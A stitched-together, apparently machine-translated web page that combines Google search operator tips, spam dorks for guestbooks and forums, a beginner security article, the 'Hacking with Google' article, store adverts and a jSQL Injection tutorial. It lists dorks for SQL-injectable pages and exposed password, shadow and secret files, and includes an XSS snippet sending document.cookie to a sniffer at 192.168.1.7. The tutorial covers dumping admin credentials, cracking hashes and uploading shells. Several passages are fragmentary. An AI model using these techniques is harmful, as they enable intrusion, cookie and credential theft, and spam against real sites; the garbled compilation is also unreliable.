Inurl single php id desired. Instructions for using jSQL Injection - a multifunctional tool for searching and exploiting SQL injections in Kali Linux

How to search correctly using google.com

Everyone probably knows how to use a search engine like Google =) But not everyone knows that if you compose it correctly search query with the help of special designs, you can achieve the results of what you are looking for much more efficiently and quickly =) In this article I will try to show what and how you need to do in order to search correctly

Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these statements change the search, or even tell Google to do completely different types of searches. For example, the link: construct is a special operator, and the request link:www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
alternative request types

cache: If you include other words in a query, Google will highlight those included words within the cached document.
For example, cache:www.web site will show the cached content with the word "web" highlighted.

link: The search query above will show web pages that contain links to the specified query.
For example: link:www.site will display all pages that have a link to http://www.site

related: Displays web pages that are “related” to the specified web page.
For example, related: www.google.com will list web pages that are similar home page Google.

info: Request Information: will present some of the information Google has about the web page you are requesting.
For example, info:website will show information about our forum =) (Armada - Adult Webmasters Forum).

Other information requests

define: The define: query will provide a definition of the words you enter after it, collected from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

stocks: If you start a query with stocks: Google will process the rest of the query terms as stock symbols, and link to a page showing ready-made information for these symbols.
For example, stocks:Intel yahoo will show information about Intel and Yahoo. (Note that you should type breaking news symbols, not the company name)

Query Modifiers

site: If you include site: in your query, Google will limit the results to those websites it finds in that domain.
You can also search by individual zones, such as ru, org, com, etc ( site:com site:ru)

allintitle: If you run a query with allintitle:, Google will limit the results to all query words in the title.
For example, allintitle: google search will return all Google pages by search such as images, Blog, etc

intitle: If you include intitle: in your query, Google will limit the results to documents containing that word in the title.
For example, intitle:Business

allinurl: If you run a query with allinurl: Google will limit the results to all query words in the URL.
For example, allinurl: google search will return documents with google and search in the title. Also, as an option, you can separate words with a slash (/) then words on both sides of the slash will be searched within the same page: Example allinurl: foo/bar

inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
For example, Animation inurl:site

intext: searches only the specified word in the page text, ignoring the title and link texts, and other things not related to. There is also a derivative of this modifier - allintext: i.e. further, all words in the query will be searched only in the text, which can also be important, ignoring frequently used words in links
For example, intext:forum

daterange: searches within a time frame (daterange:2452389-2452389), dates for times are in Julian format.

Well, and all sorts of interesting examples of queries

Examples of writing queries for Google. For spammers

Inurl:control.guest?a=sign

Site:books.dreambook.com “Homepage URL” “Sign my” inurl:sign

Site:www.freegb.net Homepage

Inurl:sign.asp “Character Count”

“Message:” inurl:sign.cfm “Sender:”

Inurl:register.php “User Registration” “Website”

Inurl:edu/guestbook “Sign the Guestbook”

Inurl:post “Post Comment” “URL”

Inurl:/archives/ “Comments:” “Remember info?”

“Script and Guestbook Created by:” “URL:” “Comments:”

Inurl:?action=add “phpBook” “URL”

Intitle:"Submit New Story"

Magazines

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Guestbook"

Blogs

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ “Post a comment” “Remember personal info?”

Inurl:greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

“Post comment” “addresses of anonymous posters” -

Intitle:"Post comment"

Inurl:pirillo.com “Post comment”

Forums

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

I decided to talk a little about information security. The article will be useful for novice programmers and those who have just begun to engage in Frontend development. What's the problem?

Many novice developers get so carried away with writing code that they completely forget about the security of their work. And most importantly, they forget about such vulnerabilities as SQL and XXS queries. They also come up with easy passwords for their administrative panels and are subjected to brute force. What are these attacks and how can you avoid them?

SQL injection

SQL injection is the most common type of attack on a database, which is carried out during an SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer error when writing the database and, strictly speaking, SQL queries.

A SQL injection attack is possible due to incorrect processing of the input data used in SQL queries. If a hacker's attack is successful, you risk losing not only the contents of the databases, but also passwords and administrative panel logs. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

The attack can be successfully reproduced in scripts written in PHP, ASP, Perl and other languages. The success of such attacks depends more on what DBMS is used and how the script itself is implemented. There are many vulnerable sites for SQL injections in the world. This is easy to verify. Just enter “dorks” - these are special queries for searching for vulnerable sites. Here are some of them:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

How to use them? It is enough to enter them into Google search engine or Yandex. The search engine will give you not just a vulnerable site, but also a page about this vulnerability. But we won’t stop there and make sure that the page is really vulnerable. To do this, it is enough to put after the value “id=1” single quote"'". Something like this:

• inurl:games.php?id=1’

And the site will give us an error about SQL query. What does our hacker need next?

And then he needs this very link to the error page. Then work on the vulnerability in most cases takes place in the "Kali linux" distribution with its utilities for this part: introducing injection code and performing the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

XSS Attack

This type of attack is carried out on Cookies files. Users, in turn, love to save them. Why not? What would we do without them? After all, thanks to Cookies, we don’t have to enter the password for Vk.com or Mail.ru a hundred times. And there are few who refuse them. But on the Internet, a rule often appears for hackers: the coefficient of convenience is directly proportional to the coefficient of insecurity.

To implement an XSS attack, our hacker needs knowledge of JavaScript. At first glance, the language is very simple and harmless, because it does not have access to computer resources. A hacker can only work with JavaScript in a browser, but that’s enough. After all, the main thing is to enter the code into the web page.

I will not talk in detail about the attack process. I will only tell you the basics and meaning of how this happens.

A hacker can add JS code to some forum or guest book:

document.location.href =”http://192.168.1.7/sniff.php?test”

The scripts will redirect us to the infected page, where the code will be executed: be it a sniffer, some kind of storage or an exploit, which will somehow steal our Cookies from the cache.

Why JavaScript? Because JavaScript is great at handling web requests and has access to Cookies. But if our script takes us to some site, the user will easily notice it. Here the hacker uses a more cunning option - he simply enters the code into the picture.

Img=new Image();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? It’s very simple - do not click on suspicious links.

DoS and DDos Attacks

DoS (from the English Denial of Service - denial of service) is a hacker attack on a computer system with the goal of causing it to fail. This is the creation of conditions under which bona fide system users cannot access the provided system resources (servers), or this access is difficult. A system failure can also be a step towards its takeover, if in an emergency situation the software produces any critical information: for example, version, part program code etc. But most often this is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid an attack significantly hit the “target” in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow almost any system to fail without leaving legally significant evidence.

What is the difference between DoS and DDos attack?

DoS is an attack designed in a clever way. For example, if the server does not check the correctness of incoming packets, then a hacker can make a request that will take forever to process, and there will not be enough processor time to work with other connections. Accordingly, clients will be denied service. But it will not be possible to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can cope with such overload without any problems.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there can be hundreds or more of them. Even super-powerful servers may not be able to cope with such an overload. Let me give you an example.

A DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts shouting loudly. It is either impossible or very difficult to talk. Solution: call security, who will calm down and remove the person from the premises. DDoS attacks are when a crowd of thousands of such ill-mannered people rushes in. In this case, the security will not be able to tie everyone up and take them away.

DoS and DDoS are carried out from computers, the so-called zombies. These are computers of users hacked by hackers who do not even suspect that their machine is participating in an attack on any server.

How to protect yourself from this? In general, no way. But you can make things more difficult for a hacker. To do this, you need to choose a good hosting with powerful servers.

Bruteforce attack

A developer can come up with a lot of attack protection systems, fully review the scripts we have written, check the site for vulnerabilities, etc. But when he gets to the last step of website layout, namely when he simply sets a password for the admin panel, he may forget about one thing. Password!

It is strictly not recommended to set a simple password. This could be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and uncomplicated attack - Brute force.

Brute force is a dictionary password attack using special programs. Dictionaries can be different: Latin, enumeration by numbers, let’s say up to a certain range, mixed (Latin + numbers), and there are even dictionaries with unique characters @#4$%&*~~`’”\ ? etc.

Of course, this type of attack is easy to avoid. Just come up with complex password. Even a captcha can save you. Also, if your site is made on a CMS, then many of them detect this type of attack and block the IP. You must always remember that the more different characters in a password, the harder it is to guess.

How do Hackers work? In most cases, they either suspect or know part of the password in advance. It is quite logical to assume that the user’s password will certainly not consist of 3 or 5 characters. Such passwords lead to frequent hacking. Basically, hackers take a range of 5 to 10 characters and add several characters that they may know in advance. Next, passwords with the required ranges are generated. The Kali Linux distribution even has programs for such cases. And voila, the attack will no longer last long, since the volume of the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, and the search speed increases by as much as 10 times. And now we see that the attack is like this in a simple way quite real. But it’s not just websites that are subject to brute force.

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always get distracted somewhere or miss something. We are programmers, but not programmed machines. Always be on guard, because losing information can have serious consequences!

Hacking with Google

Alexander Antipov

Search engine Google (www.google.com) provides many search options. All these features are an invaluable search tool for a user new to the Internet and at the same time an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists.
(9475 views in 1 week)

Denis Barankov
denisNOSPAMixi.ru

Attention: This article is not a guide to action. This article was written for you, WEB server administrators, so that you will lose the false feeling that you are safe, and you will finally understand the insidiousness of this method of obtaining information and take up the task of protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Enter another line, for example:

inurl:"auth_user_file.txt"

a little less, but this is already enough for free downloading and password guessing (using the same John The Ripper). Below I will give a number of more examples.

So, you need to realize that the Google search engine has visited most of the Internet sites and cached the information contained on them. This cached information allows you to obtain information about the site and the content of the site without directly connecting to the site, only by delving into the information that is stored inside Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All you need for this method: know some key Google words. This technique is called Google Hacking.

Information about Google Hacking first appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was raised by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. It provides the first examples of such queries:

1) Index of /admin
2) Index of /password
3) Index of /mail
4) Index of / +banques +filetype:xls (for france...)
5) Index of / +passwd
6) Index of / password.txt

This topic made waves in the English-reading part of the Internet quite recently: after the article by Johnny Long, published on May 7, 2004. For a more complete study of Google Hacking, I advise you to go to this author’s website http://johnny.ihackstuff.com. In this article I just want to bring you up to date.

Who can use this:
- Journalists, spies and all those people who like to poke their nose into other people's business can use this to search for incriminating evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes words it considers unimportant from searches. For example, question words, prepositions and articles in English: for example are, of, where. In Russian, Google seems to consider all words important. If a word is excluded from the search, Google writes about it. In order for Google to start searching for pages with these words, you need to add a + sign without a space before the word. For example:

ace +of base

Search using the sign –

If Google finds a large number of pages from which it needs to exclude pages with a certain topic, then you can force Google to search only for pages that do not contain certain words. To do this, you need to indicate these words by placing a sign in front of each - without a space before the word. For example:

fishing - vodka

Search using ~

You may want to search not only the specified word, but also its synonyms. To do this, precede the word with the ~ symbol.

Finding an exact phrase using double quotes

Google searches on each page for all occurrences of the words that you wrote in the query string, and it does not care about the relative position of the words, as long as all the specified words are on the page at the same time (this is the default action). To find the exact phrase, you need to put it in quotes. For example:

"book stand"

In order for at least one of the specified words to appear, you must specify logical operation explicit: OR. For example:

book safety OR protection

In addition, you can use the * sign in the search bar to indicate any word and. to represent any character.

Searching for words using additional operators

There are search operators that are specified in the search string in the format:

operator:search_term

Spaces next to the colon are not needed. If you insert a space after the colon, you will see an error message, and before it, Google will use them as a normal search string.
There are groups of additional search operators: languages ​​- indicate in which language you want to see the result, date - limit the results for the past three, six or 12 months, occurrences - indicate where in the document you need to search for the line: everywhere, in the title, in the URL, domains - search on a specified site or, conversely, exclude it from the search; safe search - blocks sites containing specified type information and remove them from search results pages.
However, some operators do not need an additional parameter, for example, the request “cache:www.google.com” can be called as a full-fledged search string, and some keywords, on the contrary, require a search word, such as "site:www.google.com help". In light of our topic, let's look at the following operators:

Operator	Description	Requires additional parameter?
	search only on the site specified in search_term
	search only in documents with type search_term
	find pages containing search_term in the title
	find pages containing all search_term words in the title
	find pages containing the word search_term in their address
	find pages containing all search_term words in their address

The site: operator limits the search to only the specified site, and you can specify more than just domain name, but also an IP address. For example, enter:

filetype operator: Limits the search to a specific file type. For example:

As of the publication date of the article, Google can search within 13 different file formats:

• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel(xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word(doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Shockwave Flash(swf)
• Text (ans, txt)

Link operator: Shows all pages that point to the specified page.
It's probably always interesting to see how many places on the Internet know about you. Let's try:

Cache operator: Shows the version of the site in Google's cache as it looked the last time Google visited that page. Let’s take any frequently changing site and look:

intitle operator: Searches for a specified word in the title of a page. The allintitle: operator is an extension - it searches for all specified multiple words in the page title. Compare:

intitle:flight to Mars
intitle:flight intitle:on intitle:mars
allintitle:flight to mars

The inurl operator: causes Google to show all pages containing the specified string in the URL. allinurl operator: searches for all words in a URL. For example:

allinurl:acid acid_stat_alerts.php

This command is especially useful for those who don't have SNORT - at least they can see how it works on a real system.

Hacking Methods Using Google

So, we found out that using a combination of the above operators and keywords, anyone can start collecting necessary information and searching for vulnerabilities. These techniques are often called Google Hacking.

Site map

You can use the site: operator to list all the links that Google has found on a site. Typically, pages that are dynamically created by scripts are not indexed using parameters, so some sites use ISAPI filters so that links are not in the form /article.asp?num=10&dst=5 , but with slashes /article/abc/num/10/ dst/5. This is done so that the site is generally indexed by search engines.

Let's try:

site:www.whitehouse.gov whitehouse

Google thinks that every page on a website contains the word whitehouse. This is what we use to get all the pages.
There is also a simplified version:

site:whitehouse.gov

And the best part is that the comrades from whitehouse.gov didn’t even know that we looked at the structure of their site and even looked at the cached pages that Google downloaded. This can be used to study the structure of sites and view content, remaining undetected for the time being.

View a list of files in directories

WEB servers can show lists of server directories instead of the usual ones HTML pages. This is usually done to ensure that users select and download specific files. However, in many cases, administrators have no intention of showing the contents of a directory. This occurs due to incorrect server configuration or lack of home page in the directory. As a result, the hacker has a chance to find something interesting in the directory and use it for his own purposes. To find all such pages, it is enough to note that they all contain in their title the words: index of. But since the words index of contain not only such pages, we need to refine the query and take into account the keywords on the page itself, so queries like:

intitle:index.of parent directory
intitle:index.of name size

Since most directory listings are intentional, you may have a hard time finding misplaced listings the first time. But at least you can already use listings to determine WEB versions server as described below.

Obtaining the WEB server version.

Knowing the WEB server version is always useful before launching any hacker attack. Again, thanks to Google, you can get this information without connecting to a server. If you look closely at the directory listing, you can see that the name of the WEB server and its version are displayed there.

Apache1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this information, but, as a rule, it is true. Thus, to obtain this information it is enough to send a request:

intitle:index.of server.at

To get information for a specific server, we clarify the request:

intitle:index.of server.at site:ibm.com

Or vice versa, we are looking for servers running a specific version of the server:

intitle:index.of Apache/2.0.40 Server at

This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, then he can find it and try the existing exploit.

You can also get the server version by viewing the pages that are installed by default when installing the latest version of the WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle:Test.Page.for.Apache it.worked!

Moreover, when installing some operating systems, they immediately install and launch the WEB server. However, some users are not even aware of this. Naturally, if you see that someone has not removed the default page, then it is logical to assume that the computer has not undergone any customization at all and is likely vulnerable to attack.

Try searching for IIS 5.0 pages

allintitle:Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the server version, but also Windows version and Service Pack.

Another way to determine the WEB server version is to search for manuals (help pages) and examples that may be installed on the site by default. Hackers have found quite a few ways to use these components to gain privileged access to a site. That is why you need to remove these components on the production site. Not to mention the fact that the presence of these components can be used to obtain information about the type of server and its version. For example, let's find the apache manual:

inurl:manual apache directives modules

Using Google as a CGI scanner.

CGI scanner or WEB scanner– a utility for searching for vulnerable scripts and programs on the victim’s server. These utilities must know what to look for, for this they have a whole list of vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

We can find each of these files using Google, additionally using the words index of or inurl with the file name in the search bar: we can find sites with vulnerable scripts, for example:

allinurl:/random_banner/index.cgi

Using additional knowledge, a hacker can exploit a script's vulnerability and use this vulnerability to force the script to emit any file stored on the server. For example, a password file.

How to protect yourself from Google hacking. 1. Do not post important data on the WEB server.

Even if you posted the data temporarily, you may forget about it or someone will have time to find and take this data before you erase it. Don't do this. There are many other ways to transfer data that protect it from theft.

2. Check your site.

Use the methods described to research your site. Check your site periodically for new methods that appear on the site http://johnny.ihackstuff.com. Remember that if you want to automate your actions, you need to get special permission from Google. If you read carefully http://www.google.com/terms_of_service.html, then you will see the phrase: You may not send automated queries of any sort to Google's system without express permission in advance from Google.

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site or part of it from its database, as well as remove pages from the cache. In addition, you can prohibit the search for images on your site, prohibit short fragments of pages from being shown in search results. All possibilities for deleting a site are described on the page http://www.google.com/remove.html. To do this, you must confirm that you are really the owner of this site or insert tags into the page or

4. Use robots.txt

It is known that search engines look at the robots.txt file located at the root of the site and do not index those parts that are marked with the word Disallow. You can use this to prevent part of the site from being indexed. For example, to prevent the entire site from being indexed, create a robots.txt file containing two lines:

User-agent: *
Disallow: /

What else happens

So that life doesn’t seem like honey to you, I’ll say finally that there are sites that monitor those people who, using the methods outlined above, look for holes in scripts and WEB servers. An example of such a page is

Application.

A little sweet. Try some of the following for yourself:

1. #mysql dump filetype:sql - search for database dumps mySQL data
2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found
3. phpMyAdmin running on inurl:main.php - this will force control to be closed through the phpmyadmin panel
4. not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. This report was generated by WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – maybe someone needs firewall configuration files? :)
10. intitle:index.of finances.xls – hmm....
11. intitle:Index of dbconvert.exe chats – icq chat logs
12. intext:Tobias Oetiker traffic analysis
13. intitle:Usage Statistics for Generated by Webalizer
14. intitle:statistics of advanced web statistics
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets holds shared secrets - secret key - good find
17. inurl:main.php Welcome to phpMyAdmin
18. inurl:server-info Apache Server Information
19. site:edu admin grades
20. ORA-00921: unexpected end of SQL command – getting paths
21. intitle:index.of trillian.ini
22. intitle:Index of pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Index of .mysql_history
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

"Hacking mit Google"

Training center "Informzashita" http://www.itsecurity.ru - a leading specialized center in the field of information security training (License of the Moscow Committee of Education No. 015470, State accreditation No. 004251). The only authorized training center for companies Internet Security Systems and Clearswift in Russia and the CIS countries. Microsoft authorized training center (Security specialization). The training programs are coordinated with the State Technical Commission of Russia, the FSB (FAPSI). Certificates of training and state documents on advanced training.

SoftKey is a unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide range, many payment methods, prompt (often instant) order processing, tracking the order process in the personal section, various discounts from the store and manufacturers BY.

Run the downloaded file by double clicking (you need to have virtual machine ).

3. Anonymity when checking a site for SQL injection
Setting up Tor and Privoxy in Kali Linux

[Section under development]

Setting up Tor and Privoxy on Windows

[Section under development]

Proxy settings in jSQL Injection

[Section under development]

4. Checking the site for SQL injection with jSQL Injection

Working with the program is extremely simple. Just enter the website address and press ENTER.

The following screenshot shows that the site is vulnerable to three types of SQL injections at once (information about them is indicated in the lower right corner). By clicking on the names of injections you can switch the method used:

Also, the existing databases have already been displayed to us.

You can view the contents of each table:

Typically, the most interesting thing about tables is the administrator credentials.

If you are lucky and you find the administrator’s data, then it’s too early to rejoice. You still need to find the admin panel where to enter this data.

5. Search for admin panels with jSQL Injection

To do this, go to the next tab. Here we are greeted with a list of possible addresses. You can select one or more pages to check:

The convenience lies in the fact that you do not need to use other programs.

Unfortunately, there are not very many careless programmers who store passwords in clear text. Quite often in the password line we see something like

8743b52063cd84097a65d1633f5c74f5

This is a hash. You can decrypt it using brute force. And... jSQL Injection has a built-in brute forcer.

6. Brute force hashes using jSQL Injection

The undoubted convenience is that you do not need to look for other programs. There is support for many of the most popular hashes.

This is not the most best option. In order to become a guru in decoding hashes, the Book “” in Russian is recommended.

But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with its built-in brute force function will come in very handy.

There are settings: you can set which characters are included in the password, the password length range.

7. File operations after detecting SQL injections

In addition to operations with databases - reading and modifying them, if SQL injections are detected, the following file operations can be performed:

• reading files on the server
• uploading new files to the server
• uploading shells to the server

And all this is implemented in jSQL Injection!

There are restrictions - the SQL server must have file privileges. The sensible ones system administrators they are disabled and access to file system won't be able to get it.

The presence of file privileges is quite simple to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the specified operations.

Another very important note - we need to know the exact absolute path to the file with which we will work - otherwise nothing will work.

Look at the following screenshot:

To any attempt to operate on a file, we are answered: No FILE privilege (no file privileges). And nothing can be done here.

If instead you have another error:

Problem writing into [directory_name]

This means that you incorrectly specified the absolute path where you want to write the file.

In order to guess an absolute path, you need to at least know operating system on which the server is running. To do this, switch to the Network tab.

This entry (Win64 line) gives us reason to assume that we are dealing with Windows OS:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Connection: Keep-Alive Method: HTTP/1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; charset=UTF-8

Here we have some Unix (*BSD, Linux):

Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Powered-By: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

And here we have CentOS:

Method: HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

On Windows, a typical folder for sites is C:\Server\data\htdocs\ . But, in fact, if someone “thought of” making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, you should start trying directly from the C:/Windows/ directory:

As you can see, everything went fine the first time.

But the jSQL Injection shells themselves raise doubts in my mind. If you have file privileges, then you can easily upload something with a web interface.

8. Bulk checking of sites for SQL injections

And even this function is available in jSQL Injection. Everything is extremely simple - download a list of sites (can be imported from a file), select those that you want to check and click the appropriate button to start the operation.

Conclusion from jSQL Injection

jSQL Injection is good, powerful tool to search and subsequently use SQL injections found on websites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

Among the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). Like all instruments with graphical interface, one of the disadvantages of this program can be attributed to the inability to use it in scripts. Nevertheless, some automation is also possible in this program - thanks to the built-in function of mass site checking.

The jSQL Injection program is much more convenient to use than sqlmap. But sqlmap supports more types of SQL injections, has options for working with file firewalls and some other functions.

Bottom line: jSQL Injection - best friend novice hacker.

Help for this program in the Kali Linux Encyclopedia can be found on this page: http://kali.tools/?p=706